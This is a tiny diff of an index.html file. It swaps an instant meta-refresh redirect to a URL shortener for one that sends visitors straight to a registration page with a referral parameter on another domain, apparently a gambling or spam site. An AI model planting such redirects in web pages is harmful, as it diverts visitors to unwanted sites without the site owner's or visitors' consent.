--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<meta http-equiv="Refresh" content="0; url='https://shrtlnk.biz/hb88/'" />
+<meta http-equiv="Refresh" content="0; url='https://1pangeran505.com/?content=register&ref='" />
